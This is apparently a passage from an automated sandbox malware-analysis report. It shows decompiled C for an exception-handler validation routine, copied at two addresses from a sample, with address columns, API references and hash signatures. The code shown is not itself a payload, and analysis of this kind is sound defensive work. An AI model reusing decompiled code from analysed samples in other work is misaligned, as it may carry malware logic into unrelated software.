											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x4041c0 = 1;
							__eflags =  *0x4041c0;
							if( *0x4041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x4041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x404180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x404178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                                                                                                                                                                                    0x0040237f
                                                                                                                                                                                                                                    0x00402382
                                                                                                                                                                                                                                    0x00402388
                                                                                                                                                                                                                                    0x004023a6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004023a6
                                                                                                                                                                                                                                    0x00402390
                                                                                                                                                                                                                                    0x00402399
                                                                                                                                                                                                                                    0x0040239f
                                                                                                                                                                                                                                    0x004023ae
                                                                                                                                                                                                                                    0x004023b1
                                                                                                                                                                                                                                    0x004023b4
                                                                                                                                                                                                                                    0x004023be
                                                                                                                                                                                                                                    0x004023be
                                                                                                                                                                                                                                    0x004023c0
                                                                                                                                                                                                                                    0x004023c3
                                                                                                                                                                                                                                    0x004023c5
                                                                                                                                                                                                                                    0x004023c5
                                                                                                                                                                                                                                    0x004023c7
                                                                                                                                                                                                                                    0x004023ca
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004023cc
                                                                                                                                                                                                                                    0x004023ce
                                                                                                                                                                                                                                    0x00402434
                                                                                                                                                                                                                                    0x00402434
                                                                                                                                                                                                                                    0x00402592
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402592
                                                                                                                                                                                                                                    0x004023d0
                                                                                                                                                                                                                                    0x004023d0
                                                                                                                                                                                                                                    0x004023d4
                                                                                                                                                                                                                                    0x004023d6
                                                                                                                                                                                                                                    0x004023d6
                                                                                                                                                                                                                                    0x004023d6
                                                                                                                                                                                                                                    0x004023d6
                                                                                                                                                                                                                                    0x004023d9
                                                                                                                                                                                                                                    0x004023da
                                                                                                                                                                                                                                    0x004023dd
                                                                                                                                                                                                                                    0x004023dd
                                                                                                                                                                                                                                    0x004023e1
                                                                                                                                                                                                                                    0x004023e5
                                                                                                                                                                                                                                    0x004023f3
                                                                                                                                                                                                                                    0x004023f3
                                                                                                                                                                                                                                    0x004023fb
                                                                                                                                                                                                                                    0x00402401
                                                                                                                                                                                                                                    0x00402403
                                                                                                                                                                                                                                    0x00402405
                                                                                                                                                                                                                                    0x00402415
                                                                                                                                                                                                                                    0x00402422
                                                                                                                                                                                                                                    0x00402426
                                                                                                                                                                                                                                    0x0040242b
                                                                                                                                                                                                                                    0x0040242d
                                                                                                                                                                                                                                    0x004024ab
                                                                                                                                                                                                                                    0x004024ab
                                                                                                                                                                                                                                    0x0040242f
                                                                                                                                                                                                                                    0x0040242f
                                                                                                                                                                                                                                    0x0040242f
                                                                                                                                                                                                                                    0x004024ad
                                                                                                                                                                                                                                    0x004024af
                                                                                                                                                                                                                                    0x00402590
                                                                                                                                                                                                                                    0x00402590
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004024b5
                                                                                                                                                                                                                                    0x004024b5
                                                                                                                                                                                                                                    0x004024bc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004024c2
                                                                                                                                                                                                                                    0x004024c6
                                                                                                                                                                                                                                    0x00402522
                                                                                                                                                                                                                                    0x00402524
                                                                                                                                                                                                                                    0x0040252c
                                                                                                                                                                                                                                    0x0040252e
                                                                                                                                                                                                                                    0x00402530
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402532
                                                                                                                                                                                                                                    0x00402538
                                                                                                                                                                                                                                    0x0040253a
                                                                                                                                                                                                                                    0x0040253c
                                                                                                                                                                                                                                    0x00402551
                                                                                                                                                                                                                                    0x00402551
                                                                                                                                                                                                                                    0x00402553
                                                                                                                                                                                                                                    0x00402582
                                                                                                                                                                                                                                    0x00402589
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402589
                                                                                                                                                                                                                                    0x00402557
                                                                                                                                                                                                                                    0x00402558
                                                                                                                                                                                                                                    0x0040255a
                                                                                                                                                                                                                                    0x0040255c
                                                                                                                                                                                                                                    0x0040255c
                                                                                                                                                                                                                                    0x0040255e
                                                                                                                                                                                                                                    0x00402560
                                                                                                                                                                                                                                    0x00402562
                                                                                                                                                                                                                                    0x00402576
                                                                                                                                                                                                                                    0x00402576
                                                                                                                                                                                                                                    0x00402579
                                                                                                                                                                                                                                    0x0040257b
                                                                                                                                                                                                                                    0x0040257b
                                                                                                                                                                                                                                    0x0040257c
                                                                                                                                                                                                                                    0x0040257c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402564
                                                                                                                                                                                                                                    0x00402564
                                                                                                                                                                                                                                    0x00402564
                                                                                                                                                                                                                                    0x0040256d
                                                                                                                                                                                                                                    0x0040256e
                                                                                                                                                                                                                                    0x00402570
                                                                                                                                                                                                                                    0x00402572
                                                                                                                                                                                                                                    0x00402572
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402564
                                                                                                                                                                                                                                    0x00402562
                                                                                                                                                                                                                                    0x0040253e
                                                                                                                                                                                                                                    0x00402545
                                                                                                                                                                                                                                    0x00402545
                                                                                                                                                                                                                                    0x00402547
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402549
                                                                                                                                                                                                                                    0x0040254a
                                                                                                                                                                                                                                    0x0040254d
                                                                                                                                                                                                                                    0x0040254f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040254f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402545
                                                                                                                                                                                                                                    0x004024c8
                                                                                                                                                                                                                                    0x004024cb
                                                                                                                                                                                                                                    0x004024d0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004024d9
                                                                                                                                                                                                                                    0x004024db
                                                                                                                                                                                                                                    0x004024e1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004024e7
                                                                                                                                                                                                                                    0x004024ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004024f3
                                                                                                                                                                                                                                    0x004024f5
                                                                                                                                                                                                                                    0x004024fe
                                                                                                                                                                                                                                    0x00402502
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402508
                                                                                                                                                                                                                                    0x0040250b
                                                                                                                                                                                                                                    0x0040250d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402514
                                                                                                                                                                                                                                    0x00402516
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402518
                                                                                                                                                                                                                                    0x0040251c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040251c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402407
                                                                                                                                                                                                                                    0x00402407
                                                                                                                                                                                                                                    0x00402407
                                                                                                                                                                                                                                    0x0040240e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402410
                                                                                                                                                                                                                                    0x00402411
                                                                                                                                                                                                                                    0x00402413
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402413
                                                                                                                                                                                                                                    0x0040243b
                                                                                                                                                                                                                                    0x0040243d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040244d
                                                                                                                                                                                                                                    0x0040244f
                                                                                                                                                                                                                                    0x00402451
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402457
                                                                                                                                                                                                                                    0x0040245e
                                                                                                                                                                                                                                    0x0040248a
                                                                                                                                                                                                                                    0x0040248a
                                                                                                                                                                                                                                    0x0040248c
                                                                                                                                                                                                                                    0x0040248e
                                                                                                                                                                                                                                    0x004024a2
                                                                                                                                                                                                                                    0x004024a4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402490
                                                                                                                                                                                                                                    0x00402490
                                                                                                                                                                                                                                    0x00402490
                                                                                                                                                                                                                                    0x00402499
                                                                                                                                                                                                                                    0x0040249a
                                                                                                                                                                                                                                    0x0040249c
                                                                                                                                                                                                                                    0x0040249e
                                                                                                                                                                                                                                    0x0040249e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402490
                                                                                                                                                                                                                                    0x00402460
                                                                                                                                                                                                                                    0x00402463
                                                                                                                                                                                                                                    0x00402465
                                                                                                                                                                                                                                    0x00402477
                                                                                                                                                                                                                                    0x00402477
                                                                                                                                                                                                                                    0x0040247a
                                                                                                                                                                                                                                    0x0040247c
                                                                                                                                                                                                                                    0x0040247c
                                                                                                                                                                                                                                    0x0040247d
                                                                                                                                                                                                                                    0x0040247d
                                                                                                                                                                                                                                    0x00402483
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402467
                                                                                                                                                                                                                                    0x00402467
                                                                                                                                                                                                                                    0x00402467
                                                                                                                                                                                                                                    0x0040246e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402470
                                                                                                                                                                                                                                    0x00402470
                                                                                                                                                                                                                                    0x00402471
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402471
                                                                                                                                                                                                                                    0x00402473
                                                                                                                                                                                                                                    0x00402475
                                                                                                                                                                                                                                    0x00402488
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402488
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402475
                                                                                                                                                                                                                                    0x004023e7
                                                                                                                                                                                                                                    0x004023ea
                                                                                                                                                                                                                                    0x004023ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004023ef
                                                                                                                                                                                                                                    0x004023f1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004023f1
                                                                                                                                                                                                                                    0x004023b6
                                                                                                                                                                                                                                    0x004023b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00402426
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2850889275-0
                                                                                                                                                                                                                                    • Opcode ID: 626958346fd60cabf43f0ddbfab11c40b5535eb766f8715f11b79e1d1ab16b9d
                                                                                                                                                                                                                                    • Instruction ID: 8a986e9dcfd0441aff0562b3517ea09b8d901034ce7e192845dbb0a1bddafc0a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 626958346fd60cabf43f0ddbfab11c40b5535eb766f8715f11b79e1d1ab16b9d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE61D870600612ABDB19CF29DB9C66A73A5EB95314F24843BDD16F72D1E3BCDC82864C
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9B341, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F9B341(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x2f9d2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x2f9d328 = 1;
										__eflags =  *0x2f9d328;
										if( *0x2f9d328 != 0) {
											goto L60;
										}
										_t84 =  *0x2f9d2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x2f9d328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x2f9d2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x2f9d2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x2f9d2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x2f9d328 = 1;
							__eflags =  *0x2f9d328;
							if( *0x2f9d328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x2f9d328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x2f9d2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x2f9d2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2f9d2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                                                                                                                                                                                    0x02f9b34b
                                                                                                                                                                                                                                    0x02f9b34e
                                                                                                                                                                                                                                    0x02f9b354
                                                                                                                                                                                                                                    0x02f9b372
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b372
                                                                                                                                                                                                                                    0x02f9b35c
                                                                                                                                                                                                                                    0x02f9b365
                                                                                                                                                                                                                                    0x02f9b36b
                                                                                                                                                                                                                                    0x02f9b37a
                                                                                                                                                                                                                                    0x02f9b37d
                                                                                                                                                                                                                                    0x02f9b380
                                                                                                                                                                                                                                    0x02f9b38a
                                                                                                                                                                                                                                    0x02f9b38a
                                                                                                                                                                                                                                    0x02f9b38c
                                                                                                                                                                                                                                    0x02f9b38f
                                                                                                                                                                                                                                    0x02f9b391
                                                                                                                                                                                                                                    0x02f9b391
                                                                                                                                                                                                                                    0x02f9b393
                                                                                                                                                                                                                                    0x02f9b396
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b398
                                                                                                                                                                                                                                    0x02f9b39a
                                                                                                                                                                                                                                    0x02f9b400
                                                                                                                                                                                                                                    0x02f9b400
                                                                                                                                                                                                                                    0x02f9b55e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b55e
                                                                                                                                                                                                                                    0x02f9b39c
                                                                                                                                                                                                                                    0x02f9b39c
                                                                                                                                                                                                                                    0x02f9b3a0
                                                                                                                                                                                                                                    0x02f9b3a2
                                                                                                                                                                                                                                    0x02f9b3a2
                                                                                                                                                                                                                                    0x02f9b3a2
                                                                                                                                                                                                                                    0x02f9b3a2
                                                                                                                                                                                                                                    0x02f9b3a5
                                                                                                                                                                                                                                    0x02f9b3a6
                                                                                                                                                                                                                                    0x02f9b3a9
                                                                                                                                                                                                                                    0x02f9b3a9
                                                                                                                                                                                                                                    0x02f9b3ad
                                                                                                                                                                                                                                    0x02f9b3b1
                                                                                                                                                                                                                                    0x02f9b3bf
                                                                                                                                                                                                                                    0x02f9b3bf
                                                                                                                                                                                                                                    0x02f9b3c7
                                                                                                                                                                                                                                    0x02f9b3cd
                                                                                                                                                                                                                                    0x02f9b3cf
                                                                                                                                                                                                                                    0x02f9b3d1
                                                                                                                                                                                                                                    0x02f9b3e1
                                                                                                                                                                                                                                    0x02f9b3ee
                                                                                                                                                                                                                                    0x02f9b3f2
                                                                                                                                                                                                                                    0x02f9b3f7
                                                                                                                                                                                                                                    0x02f9b3f9
                                                                                                                                                                                                                                    0x02f9b477
                                                                                                                                                                                                                                    0x02f9b477
                                                                                                                                                                                                                                    0x02f9b3fb
                                                                                                                                                                                                                                    0x02f9b3fb
                                                                                                                                                                                                                                    0x02f9b3fb
                                                                                                                                                                                                                                    0x02f9b479
                                                                                                                                                                                                                                    0x02f9b47b
                                                                                                                                                                                                                                    0x02f9b55c
                                                                                                                                                                                                                                    0x02f9b55c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b481
                                                                                                                                                                                                                                    0x02f9b481
                                                                                                                                                                                                                                    0x02f9b488
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b48e
                                                                                                                                                                                                                                    0x02f9b492
                                                                                                                                                                                                                                    0x02f9b4ee
                                                                                                                                                                                                                                    0x02f9b4f0
                                                                                                                                                                                                                                    0x02f9b4f8
                                                                                                                                                                                                                                    0x02f9b4fa
                                                                                                                                                                                                                                    0x02f9b4fc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4fe
                                                                                                                                                                                                                                    0x02f9b504
                                                                                                                                                                                                                                    0x02f9b506
                                                                                                                                                                                                                                    0x02f9b508
                                                                                                                                                                                                                                    0x02f9b51d
                                                                                                                                                                                                                                    0x02f9b51d
                                                                                                                                                                                                                                    0x02f9b51f
                                                                                                                                                                                                                                    0x02f9b54e
                                                                                                                                                                                                                                    0x02f9b555
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b555
                                                                                                                                                                                                                                    0x02f9b523
                                                                                                                                                                                                                                    0x02f9b524
                                                                                                                                                                                                                                    0x02f9b526
                                                                                                                                                                                                                                    0x02f9b528
                                                                                                                                                                                                                                    0x02f9b528
                                                                                                                                                                                                                                    0x02f9b52a
                                                                                                                                                                                                                                    0x02f9b52c
                                                                                                                                                                                                                                    0x02f9b52e
                                                                                                                                                                                                                                    0x02f9b542
                                                                                                                                                                                                                                    0x02f9b542
                                                                                                                                                                                                                                    0x02f9b545
                                                                                                                                                                                                                                    0x02f9b547
                                                                                                                                                                                                                                    0x02f9b547
                                                                                                                                                                                                                                    0x02f9b548
                                                                                                                                                                                                                                    0x02f9b548
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b530
                                                                                                                                                                                                                                    0x02f9b530
                                                                                                                                                                                                                                    0x02f9b530
                                                                                                                                                                                                                                    0x02f9b539
                                                                                                                                                                                                                                    0x02f9b53a
                                                                                                                                                                                                                                    0x02f9b53c
                                                                                                                                                                                                                                    0x02f9b53e
                                                                                                                                                                                                                                    0x02f9b53e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b530
                                                                                                                                                                                                                                    0x02f9b52e
                                                                                                                                                                                                                                    0x02f9b50a
                                                                                                                                                                                                                                    0x02f9b511
                                                                                                                                                                                                                                    0x02f9b511
                                                                                                                                                                                                                                    0x02f9b513
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b515
                                                                                                                                                                                                                                    0x02f9b516
                                                                                                                                                                                                                                    0x02f9b519
                                                                                                                                                                                                                                    0x02f9b51b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b51b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b511
